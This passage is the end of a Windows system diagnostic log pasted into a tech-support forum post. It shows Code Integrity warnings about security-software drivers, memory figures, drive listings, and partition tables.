Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:39.308 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:39.196 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:39.070 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:27.280 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:27.171 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHzPercentage of memory in use: 49%Total physical RAM: 3060.46 MBAvailable physical RAM: 1540.3 MBTotal Pagefile: 6353.2 MBAvailable Pagefile: 4717.66 MBTotal Virtual: 2047.88 MBAvailable Virtual: 1907.04 MB ==================== Drives ================================ Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:222.38 GB) NTFS ==>[Drive with boot components (obtained from BCD)]Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFSDrive f: (CC) (Removable) (Total:1.92 GB) (Free:1.88 GB) NTFS ==================== MBR & Partition Table ================== ========================================================Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS) ========================================================Disk: 1 (Size: 1.9 GB) (Disk ID: E79A82AA)Partition 1: (Active) - (Size=1.9 GB) - (Type=07 NTFS) ==================== End Of Log ============================ Link to post Share on other sites More sharing options...
Recommended Posts